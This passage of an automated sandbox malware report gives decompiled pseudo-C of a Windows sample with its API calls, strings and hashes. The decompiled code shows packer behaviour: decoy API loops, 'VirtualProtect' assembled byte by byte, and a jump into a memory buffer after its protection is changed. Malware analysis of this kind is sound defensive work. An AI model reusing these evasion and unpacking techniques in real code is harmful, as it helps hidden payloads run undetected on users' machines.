                      						_v136 = _v136 - 0x141cfa96;
                      						_v296 = _v296 + 0x1d7db3b5;
                      						_v60 = _v60 - 0x63ba0c91;
                      						_v88 = _v88 - 0x1ee4938d;
                      						_v80 = _v80 + 0x7743f0d1;
                      						_v276 = _v276 - 0xac60d68;
                      						_v272 = _v272 - 0x1ce466d9;
                      						_v252 = _v252 - 0x400cde42;
                      						_v56 = _v56 + 0x7acaa60e;
                      						_v80 = _v80 - 0x6466e154;
                      						_v136 = _v136 - 0x3d665518;
                      						_v72 = _v72 - 0x2c800c08;
                      						_v68 = _v68 - 0x64c489e9;
                      					}
                      					GetSystemDefaultLCID();
                      					if(_t700 > 0x1b3afd6) {
                      						break;
                      					}
                      					_t700 = _t700 + 1;
                      					if(_t700 < 0x16bae1c0) {
                      						continue;
                      					}
                      					break;
                      				}
                      				E00404D37();
                      				_t661 = 0;
                      				do {
                      					if(_t661 == 0x770e) {
                      						E00404E02(_t661);
                      					}
                      					_t661 = _t661 + 1;
                      				} while (_t661 < 0x286b97d);
                      				_t701 = 0x7b;
                      				do {
                      					if( *0x445044 == 0xf) {
                      						__imp__FindActCtxSectionStringW(0, 0, 0, 0,  &_v420);
                      					}
                      					_t701 = _t701 - 1;
                      				} while (_t701 != 0);
                      				_v12 = 0x184cc;
                      				do {
                      					if( *0x445044 == 0x1833b) {
                      						__imp__GetVolumePathNameA("yeyofatuw layesoxegejepofazugazotigitohoni lohoma",  &_v2468, 0);
                      						FindFirstChangeNotificationA(0, 0, 0);
                      						WriteConsoleW(0,  &_v1444, 0,  &_v16, 0);
                      						GetFileAttributesA(0);
                      						TlsSetValue(0, 0);
                      						__imp__GetConsoleAliasesW( &_v4516, 0, 0);
                      						EnumSystemCodePagesW(0, 0);
                      						GetFileAttributesA(0);
                      						__imp__GetVolumeNameForVolumeMountPointA(0, 0, 0);
                      						_v8 = 0;
                      						asm("stosw");
                      						_push( &_v20);
                      						_push(_v8);
                      						_push(0);
                      						_push(0);
                      						_push(0);
                      						FillConsoleOutputCharacterW();
                      						FoldStringW(0, 0, 0, 0, 0);
                      					}
                      					_t509 =  &_v12;
                      					 *_t509 = _v12 - 1;
                      				} while ( *_t509 != 0);
                      				E00404B4D();
                      				return  *0x444e10();
                      			}



































































































                      0x00404ece
                      0x00404ee0
                      0x00404ee5
                      0x00404eea
                      0x00404eeb
                      0x00404ef1
                      0x00404ef3
                      0x00404ef3
                      0x00404ef8
                      0x00404f16
                      0x00404f1b
                      0x00404f21
                      0x00404f26
                      0x00404f2b
                      0x00404f33
                      0x00404f35
                      0x00404f47
                      0x00404f54
                      0x00404f5c
                      0x00404f5c
                      0x00404f62
                      0x00404f63
                      0x00404f35
                      0x00404f6b
                      0x00404f6d
                      0x00404f77
                      0x00404f7f
                      0x00404f90
                      0x00404f9e
                      0x00404fa9
                      0x00404fcc
                      0x00404fd9
                      0x00404fee
                      0x00404fee
                      0x00404ff4
                      0x00404ff5
                      0x00405001
                      0x00405003
                      0x00405003
                      0x0040500f
                      0x00405015
                      0x0040501c
                      0x00405023
                      0x0040502a
                      0x00405031
                      0x00405038
                      0x00405042
                      0x00405049
                      0x00405053
                      0x0040505a
                      0x00405061
                      0x0040506b
                      0x00405075
                      0x0040507f
                      0x00405089
                      0x00405093
                      0x0040509d
                      0x004050a7
                      0x004050b1
                      0x004050bb
                      0x004050c2
                      0x004050cc
                      0x004050d6
                      0x004050dd
                      0x004050e7
                      0x004050ee
                      0x004050f8
                      0x00405102
                      0x0040510c
                      0x00405113
                      0x0040511a
                      0x00405121
                      0x00405128
                      0x0040512f
                      0x00405139
                      0x00405143
                      0x0040514d
                      0x00405154
                      0x0040515e
                      0x00405165
                      0x0040516c
                      0x00405176
                      0x00405180
                      0x0040518a
                      0x00405194
                      0x0040519b
                      0x004051a5
                      0x004051ac
                      0x004051b3
                      0x004051ba
                      0x004051c4
                      0x004051ce
                      0x004051d8
                      0x004051e2
                      0x004051ec
                      0x004051f6
                      0x004051fd
                      0x00405207
                      0x0040520e
                      0x00405218
                      0x00405222
                      0x00405229
                      0x00405233
                      0x0040523a
                      0x00405241
                      0x0040524b
                      0x00405255
                      0x0040525c
                      0x00405263
                      0x0040526d
                      0x00405277
                      0x00405281
                      0x00405288
                      0x0040528f
                      0x00405299
                      0x004052a3
                      0x004052ad
                      0x004052b7
                      0x004052c1
                      0x004052cb
                      0x004052d5
                      0x004052df
                      0x004052e9
                      0x004052f3
                      0x004052fa
                      0x0040530c
                      0x0040531e
                      0x00405325
                      0x0040532c
                      0x00405333
                      0x0040534e
                      0x00405358
                      0x0040535f
                      0x00405369
                      0x00405386
                      0x00405390
                      0x0040539a
                      0x004053a1
                      0x004053ab
                      0x004053d1
                      0x004053d8
                      0x004053df
                      0x004053f1
                      0x00405406
                      0x0040540d
                      0x00405414
                      0x0040541b
                      0x00405422
                      0x00405437
                      0x00405441
                      0x0040544b
                      0x00405455
                      0x0040545c
                      0x00405474
                      0x004054a5
                      0x004054af
                      0x004054b6
                      0x004054c0
                      0x004054ca
                      0x004054f0
                      0x004054fa
                      0x00405504
                      0x0040550b
                      0x00405515
                      0x0040551f
                      0x00405526
                      0x00405530
                      0x00405537
                      0x00405541
                      0x0040554b
                      0x00405555
                      0x00405567
                      0x0040556e
                      0x00405580
                      0x0040558a
                      0x00405594
                      0x0040559e
                      0x004055a8
                      0x004055b2
                      0x004055e6
                      0x0040560c
                      0x00405613
                      0x0040561a
                      0x00405624
                      0x0040562b
                      0x00405640
                      0x00405655
                      0x0040565f
                      0x00405666
                      0x00405670
                      0x0040567a
                      0x0040568f
                      0x004056aa
                      0x004056b1
                      0x004056bb
                      0x004056c5
                      0x004056cc
                      0x004056de
                      0x004056e5
                      0x00405711
                      0x0040572c
                      0x00405747
                      0x0040574e
                      0x00405755
                      0x00405770
                      0x00405777
                      0x00405789
                      0x0040578f
                      0x0040579b
                      0x00000000
                      0x00000000
                      0x0040579d
                      0x004057a4
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004057a4
                      0x004057aa
                      0x004057af
                      0x004057b1
                      0x004057b7
                      0x004057b9
                      0x004057b9
                      0x004057be
                      0x004057bf
                      0x004057c9
                      0x004057ca
                      0x004057d1
                      0x004057de
                      0x004057de
                      0x004057e4
                      0x004057e4
                      0x004057ed
                      0x004057f4
                      0x004057fe
                      0x00405811
                      0x0040581a
                      0x0040582e
                      0x00405835
                      0x00405839
                      0x00405848
                      0x00405850
                      0x00405857
                      0x0040585c
                      0x00405864
                      0x0040586b
                      0x00405870
                      0x00405871
                      0x00405874
                      0x00405875
                      0x00405876
                      0x00405877
                      0x00405882
                      0x00405882
                      0x00405888
                      0x00405888
                      0x00405888
                      0x00405891
                      0x004058a0

                      APIs
                      • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00404F07
                      • LocalAlloc.KERNELBASE(00000000), ref: 00404F1B
                      • CreateJobObjectA.KERNEL32(00000000,kowax), ref: 00404F5C
                      • SetFileAttributesA.KERNEL32(pawujagobovalewobukalokaw,00000000), ref: 00404F7F
                      • GetProfileIntW.KERNEL32 ref: 00404F90
                      • GetCPInfo.KERNEL32(00000000,?), ref: 00404F9E
                      • FoldStringA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00404FA9
                      • GetVolumeInformationA.KERNEL32(00000000,?,00000000,?,?,?,?,00000000), ref: 00404FCC
                      • OpenJobObjectW.KERNEL32 ref: 00404FD9
                      • GetCalendarInfoW.KERNEL32(00000000,00000000,00000000,?,00000000,?), ref: 00404FEE
                      • GetLastError.KERNEL32 ref: 00405003
                        • Part of subcall function 0040650A: __wcstoi64.LIBCMT ref: 00406516
                        • Part of subcall function 00406E58: _doexit.LIBCMT ref: 00406E64
                      • GetSystemDefaultLCID.KERNEL32(12652DE7,78838E04,5CF25B83,32A1E7FB,7F832484,723D872F,63BA0C91,03A6C434,3A465D9D,5F80CD7C,23420A38,3720702C,78838E04,3B8C8B6A,723D872F,17F9CBEA), ref: 0040578F
                      • FindActCtxSectionStringW.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 004057DE
                      • GetVolumePathNameA.KERNEL32 ref: 00405811
                      • FindFirstChangeNotificationA.KERNEL32(00000000,00000000,00000000), ref: 0040581A
                      • WriteConsoleW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040582E
                      • GetFileAttributesA.KERNEL32(00000000), ref: 00405835
                      • TlsSetValue.KERNEL32(00000000,00000000), ref: 00405839
                      • GetConsoleAliasesW.KERNEL32(?,00000000,00000000), ref: 00405848
                      • EnumSystemCodePagesW.KERNEL32(00000000,00000000), ref: 00405850
                      • GetFileAttributesA.KERNEL32(00000000), ref: 00405857
                      • GetVolumeNameForVolumeMountPointA.KERNEL32(00000000,00000000,00000000), ref: 0040585C
                      • FillConsoleOutputCharacterW.KERNEL32(00000000,00000000,00000000,?,?), ref: 00405877
                      • FoldStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00405882
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.304961274.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.304953062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305007743.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305016112.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305025625.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305042313.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305046967.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Similarity
                      • API ID: Volume$AttributesConsoleFileString$FindFoldInfoNameObjectSystem$AliasesAllocCalendarChangeCharacterCodeCreateDefaultEnumErrorFillFirstHandleInformationLastLocalModuleMountNotificationOpenOutputPagesPathPointProfileSectionValueWrite__wcstoi64_doexit
                      • String ID: "c0$'=0$,p 7$2*$4h3?$8B#$:<-@$L*Pv$LJU$Tfd$ceyizevojapaxujekoxago$e$y$fs>$hiwapikijokutopesowayuzali$kernel32.dll$kowax$l34T$lm|4$pawujagobovalewobukalokaw$pudecebubafafelomulawogosu$yeyofatuw layesoxegejepofazugazotigitohoni lohoma$zo@[$zs=A$\?\
                      • API String ID: 4208290323-2628406891
                      • Opcode ID: 1fca9fa96c6eebaaf54d923840e39ccf08a41cb6124d0632cfb2b1b60addb162
                      • Instruction ID: 78cf2fa3f877f5263b9bd10f6395cf13489549c676e42dc0d8b4e6413922f006
                      • Opcode Fuzzy Hash: 1fca9fa96c6eebaaf54d923840e39ccf08a41cb6124d0632cfb2b1b60addb162
                      • Instruction Fuzzy Hash: D93240B5D01228DBCB608FA6D989ADEBB74FF05304F208099E54ABB611D7344A85CF5A
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 88 490420-4904f8 90 4904fa 88->90 91 4904ff-49053c CreateWindowExA 88->91 92 4905aa-4905ad 90->92 93 49053e 91->93 94 490540-490558 PostMessageA 91->94 93->92 95 49055f-490563 94->95 95->92 96 490565-490579 95->96 96->92 98 49057b-490582 96->98 99 4905a8 98->99 100 490584-490588 98->100 99->95 100->99 101 49058a-490591 100->101 101->99 102 490593-490597 call 490110 101->102 104 49059c-4905a5 102->104 104->99
                      APIs
                      • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 00490533
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.305076763.0000000000490000.00000040.00001000.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_490000_file.jbxd
                      Similarity
                      • API ID: CreateWindow
                      • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                      • API String ID: 716092398-2341455598
                      • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                      • Instruction ID: c595e1fde7994eb686f462602050c9c2d5c96089d599d23a24042b6367ab93df
                      • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                      • Instruction Fuzzy Hash: 0B510970D08388EEEF11CB98C849BDEBFB26F11708F144059D5446F286C3BA5659CB66
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 105 404e1c-404ec5 GetProcAddress VirtualProtect
                      C-Code - Quality: 100%
                      			E00404E1C(void* __ecx) {
                      				long _v8;
                      				long _v12;
                      				int _t8;
                      
                      				 *0x443d78 = 0x56;
                      				 *0x443d79 = 0x69;
                      				 *0x443d7a = 0x72;
                      				 *0x443d7f = 0x50;
                      				 *0x443d85 = 0x74;
                      				 *0x443d86 = 0;
                      				 *0x443d7b = 0x74;
                      				 *0x443d7c = 0x75;
                      				 *0x443d7d = 0x61;
                      				 *0x443d7e = 0x6c;
                      				 *0x443d80 = 0x72;
                      				 *0x443d81 = 0x6f;
                      				 *0x443d82 = 0x74;
                      				 *0x443d83 = 0x65;
                      				 *0x443d84 = 0x63;
                      				 *0x444e08 = GetProcAddress( *0x444e14, "msimg32.dll");
                      				_v8 = 0x20;
                      				_v8 = _v8 + 0x20;
                      				_t8 = VirtualProtect( *0x444e10,  *0x445044, _v8,  &_v12); // executed
                      				return _t8;
                      			}






                      0x00404e2c
                      0x00404e33
                      0x00404e3a
                      0x00404e41
                      0x00404e48
                      0x00404e4f
                      0x00404e56
                      0x00404e5d
                      0x00404e64
                      0x00404e6b
                      0x00404e72
                      0x00404e79
                      0x00404e80
                      0x00404e87
                      0x00404e8e
                      0x00404e9b
                      0x00404ea0
                      0x00404ea7
                      0x00404ebe
                      0x00404ec5

                      APIs
                      • GetProcAddress.KERNEL32(msimg32.dll), ref: 00404E95
                      • VirtualProtect.KERNELBASE(00000020,?), ref: 00404EBE
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.304961274.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.304953062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305007743.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305016112.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305025625.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305042313.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305046967.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Similarity
                      • API ID: AddressProcProtectVirtual
                      • String ID: $msimg32.dll
                      • API String ID: 3759838892-256693350
                      • Opcode ID: e8c53eb9e1789a708b3bfd014fe1121ff44591cff8cf9a1b8de11330ac3227a2
                      • Instruction ID: 6f25863f50b641dd1371640d0c64a8b1e4f38b6a0ceed99856ed9b25f61843b2
                      • Opcode Fuzzy Hash: e8c53eb9e1789a708b3bfd014fe1121ff44591cff8cf9a1b8de11330ac3227a2
                      • Instruction Fuzzy Hash: 4311C0ACC08AC0DDE706CF64ED097057F956727B4AF1400A8D194062B2C3FA1718D739
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 106 4905b0-4905d5 107 4905dc-4905e0 106->107 108 49061e-490621 107->108 109 4905e2-4905f5 GetFileAttributesA 107->109 110 490613-49061c 109->110 111 4905f7-4905fe 109->111 110->107 111->110 112 490600-49060b call 490420 111->112 114 490610 112->114 114->110
                      APIs
                      • GetFileAttributesA.KERNELBASE(apfHQ), ref: 004905EC
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.305076763.0000000000490000.00000040.00001000.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_490000_file.jbxd
                      Similarity
                      • API ID: AttributesFile
                      • String ID: apfHQ$o
                      • API String ID: 3188754299-2999369273
                      • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                      • Instruction ID: 610c00835c1bb1f789a608e27ad39146a6d5d00c88f1c199690538adefed8a6e
                      • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                      • Instruction Fuzzy Hash: 5C011E70C0424CEEDF10DB98C5187AEBFB5AF41308F1480ADC4492B342D77A9B59DBA6
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 115 40cb55-40cb64 GetEnvironmentStringsW 116 40cb66-40cb69 115->116 117 40cb6a-40cb6d 115->117 118 40cb7d-40cb86 call 40d677 117->118 119 40cb6f-40cb74 117->119 122 40cb8b-40cb90 118->122 119->119 120 40cb76-40cb7b 119->120 120->118 120->119 123 40cb92-40cb9e FreeEnvironmentStringsW 122->123 124 40cb9f-40cbaa call 40b100 122->124 124->123
                      C-Code - Quality: 100%
                      			E0040CB55() {
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				WCHAR* _t1;
                      				void* _t5;
                      				void* _t18;
                      				WCHAR* _t20;
                      
                      				_t1 = GetEnvironmentStringsW();
                      				_t20 = _t1;
                      				if(_t20 != 0) {
                      					if( *_t20 != 0) {
                      						goto L3;
                      						do {
                      							do {
                      								L3:
                      								_t1 =  &(_t1[1]);
                      							} while ( *_t1 != 0);
                      							_t1 =  &(_t1[1]);
                      						} while ( *_t1 != 0);
                      					}
                      					_t13 = _t1 - _t20 + 2;
                      					_t5 = E0040D677(_t1 - _t20 + 2); // executed
                      					_t18 = _t5;
                      					if(_t18 != 0) {
                      						E0040B100(_t13, _t18, _t20, _t18, _t20, _t13);
                      					}
                      					FreeEnvironmentStringsW(_t20);
                      					return _t18;
                      				} else {
                      					return 0;
                      				}
                      			}










                      0x0040cb58
                      0x0040cb5e
                      0x0040cb64
                      0x0040cb6d
                      0x00000000
                      0x0040cb6f
                      0x0040cb6f
                      0x0040cb6f
                      0x0040cb70
                      0x0040cb71
                      0x0040cb77
                      0x0040cb78
                      0x0040cb6f
                      0x0040cb82
                      0x0040cb86
                      0x0040cb8b
                      0x0040cb90
                      0x0040cba2
                      0x0040cba7
                      0x0040cb93
                      0x0040cb9e
                      0x0040cb66
                      0x0040cb69
                      0x0040cb69

                      APIs
                      • GetEnvironmentStringsW.KERNEL32(00000000,00406FD2), ref: 0040CB58
                      • __malloc_crt.LIBCMT ref: 0040CB86
                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0040CB93
                      Memory Dump Source
                      • Source File: 00000000.00000002.304961274.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.304953062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305007743.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305016112.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305025625.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305042313.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305046967.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Similarity
                      • API ID: EnvironmentStrings$Free__malloc_crt
                      • String ID:
                      • API String ID: 237123855-0
                      • Opcode ID: 540efd0d5cb155af12a62a9ca8cb82a6a4a21e7cbbc29b15b2f14ee7371bbd70
                      • Instruction ID: e68d3ad6946e2ebdad21e99f61c40b24010c0b22ff8cb5065c2f402156d26964
                      • Opcode Fuzzy Hash: 540efd0d5cb155af12a62a9ca8cb82a6a4a21e7cbbc29b15b2f14ee7371bbd70
                      • Instruction Fuzzy Hash: CDF0E2369011209ACB2537757C898773238DA8A769312063BF492E3280E63C4C8282AC
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 127 404b4d-404bac LoadLibraryA
                      C-Code - Quality: 100%
                      			E00404B4D() {
                      				struct HINSTANCE__* _t1;
                      
                      				 *0x443d81 = 0x6c;
                      				 *0x443d7b = 0x6d;
                      				 *0x443d7a = 0x69;
                      				 *0x443d7c = 0x67;
                      				 *0x443d80 = 0x64;
                      				 *0x443d83 = 0;
                      				 *0x443d7d = 0x33;
                      				 *0x443d79 = 0x73;
                      				 *0x443d82 = 0x6c;
                      				 *0x443d7f = 0x2e;
                      				 *0x443d7e = 0x32;
                      				 *0x443d78 = 0x6d; // executed
                      				_t1 = LoadLibraryA("msimg32.dll"); // executed
                      				return _t1;
                      			}




                      0x00404b52
                      0x00404b59
                      0x00404b60
                      0x00404b67
                      0x00404b6e
                      0x00404b75
                      0x00404b7c
                      0x00404b83
                      0x00404b8a
                      0x00404b91
                      0x00404b98
                      0x00404b9f
                      0x00404ba6
                      0x00404bac

                      APIs
                      • LoadLibraryA.KERNELBASE(msimg32.dll,00405896), ref: 00404BA6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.304961274.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.304953062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305007743.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305016112.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305025625.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305042313.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305046967.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Similarity
                      • API ID: LibraryLoad
                      • String ID: msimg32.dll
                      • API String ID: 1029625771-3287713914
                      • Opcode ID: 4acef38d85a8f021204f4c458d21d09699c0622470c0587138ab3e39decb9d99
                      • Instruction ID: 18dcf3e117442de746913ffebf9f7dc67a6f414c28d666744ff623687268d2c2
                      • Opcode Fuzzy Hash: 4acef38d85a8f021204f4c458d21d09699c0622470c0587138ab3e39decb9d99
                      • Instruction Fuzzy Hash: BFF0CB9CD4CAC0D8F7068B79A9197143E961723F4AF4840AA81D51A6A2C3FB1368D77E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 128 4074c4-4074e6 HeapCreate 129 4074e8-4074e9 128->129 130 4074ea-4074f3 128->130
                      C-Code - Quality: 100%
                      			E004074C4(intOrPtr _a4) {
                      				void* _t6;
                      
                      				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                      				 *0x443248 = _t6;
                      				if(_t6 != 0) {
                      					 *0x4461dc = 1;
                      					return 1;
                      				} else {
                      					return _t6;
                      				}
                      			}




                      0x004074d9
                      0x004074df
                      0x004074e6
                      0x004074ed
                      0x004074f3
                      0x004074e9
                      0x004074e9
                      0x004074e9

                      APIs
                      • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 004074D9
                      Memory Dump Source
                      • Source File: 00000000.00000002.304961274.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.304953062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305007743.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305016112.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305025625.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305042313.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305046967.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Similarity
                      • API ID: CreateHeap
                      • String ID:
                      • API String ID: 10892065-0
                      • Opcode ID: 9f48e84f229b4ffec300d8d6d4d0ef85a53f42f2fda0780c50527cd5d9dd1d9b
                      • Instruction ID: 57482c73cd61c5f06661b8fff8ca1e44c0a8f9e8ee1e1a57e1633cefcc3b7c4d
                      • Opcode Fuzzy Hash: 9f48e84f229b4ffec300d8d6d4d0ef85a53f42f2fda0780c50527cd5d9dd1d9b
                      • Instruction Fuzzy Hash: E1D0A776A54384AFEB105F717D09B723BDCE385795F108436F90DC61A0F575D680CA09
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 131 40bb1b-40bb1d call 40baa9 133 40bb22-40bb23 131->133
                      C-Code - Quality: 100%
                      			E0040BB1B() {
                      				void* _t1;
                      
                      				_t1 = E0040BAA9(0); // executed
                      				return _t1;
                      			}




                      0x0040bb1d
                      0x0040bb23

                      APIs
                      • __encode_pointer.LIBCMT ref: 0040BB1D
                        • Part of subcall function 0040BAA9: TlsGetValue.KERNEL32(00000000,?,0040BB22,00000000,0040DAE4,004433A8,00000000,00000314,?,004084CB,004433A8,Microsoft Visual C++ Runtime Library,00012010), ref: 0040BABB
                        • Part of subcall function 0040BAA9: TlsGetValue.KERNEL32(00000002,?,0040BB22,00000000,0040DAE4,004433A8,00000000,00000314,?,004084CB,004433A8,Microsoft Visual C++ Runtime Library,00012010), ref: 0040BAD2
                        • Part of subcall function 0040BAA9: RtlEncodePointer.NTDLL(00000000,?,0040BB22,00000000,0040DAE4,004433A8,00000000,00000314,?,004084CB,004433A8,Microsoft Visual C++ Runtime Library,00012010), ref: 0040BB10
                      Memory Dump Source
                      • Source File: 00000000.00000002.304961274.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.304953062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305007743.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305016112.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305025625.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305042313.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305046967.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Similarity
                      • API ID: Value$EncodePointer__encode_pointer
                      • String ID:
                      • API String ID: 2585649348-0
                      • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                      • Instruction ID: 7e4224bbe38dc51f274b3f09f605fa0bbf77e352b7c6d7f78f2a44217b079060
                      • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                      • Instruction Fuzzy Hash:
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 85%
                      			E0040DAC5(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                      				intOrPtr _v0;
                      				void* _v804;
                      				intOrPtr _v808;
                      				intOrPtr _v812;
                      				intOrPtr _t6;
                      				intOrPtr _t11;
                      				intOrPtr _t12;
                      				intOrPtr _t13;
                      				long _t17;
                      				intOrPtr _t21;
                      				intOrPtr _t22;
                      				intOrPtr _t25;
                      				intOrPtr _t26;
                      				intOrPtr _t27;
                      				intOrPtr* _t31;
                      				void* _t34;
                      
                      				_t27 = __esi;
                      				_t26 = __edi;
                      				_t25 = __edx;
                      				_t22 = __ecx;
                      				_t21 = __ebx;
                      				_t6 = __eax;
                      				_t34 = _t22 -  *0x4185e8; // 0x844fa449
                      				if(_t34 == 0) {
                      					asm("repe ret");
                      				}
                      				 *0x443a88 = _t6;
                      				 *0x443a84 = _t22;
                      				 *0x443a80 = _t25;
                      				 *0x443a7c = _t21;
                      				 *0x443a78 = _t27;
                      				 *0x443a74 = _t26;
                      				 *0x443aa0 = ss;
                      				 *0x443a94 = cs;
                      				 *0x443a70 = ds;
                      				 *0x443a6c = es;
                      				 *0x443a68 = fs;
                      				 *0x443a64 = gs;
                      				asm("pushfd");
                      				_pop( *0x443a98);
                      				 *0x443a8c =  *_t31;
                      				 *0x443a90 = _v0;
                      				 *0x443a9c =  &_a4;
                      				 *0x4439d8 = 0x10001;
                      				_t11 =  *0x443a90; // 0x0
                      				 *0x44398c = _t11;
                      				 *0x443980 = 0xc0000409;
                      				 *0x443984 = 1;
                      				_t12 =  *0x4185e8; // 0x844fa449
                      				_v812 = _t12;
                      				_t13 =  *0x4185ec; // 0x7bb05bb6
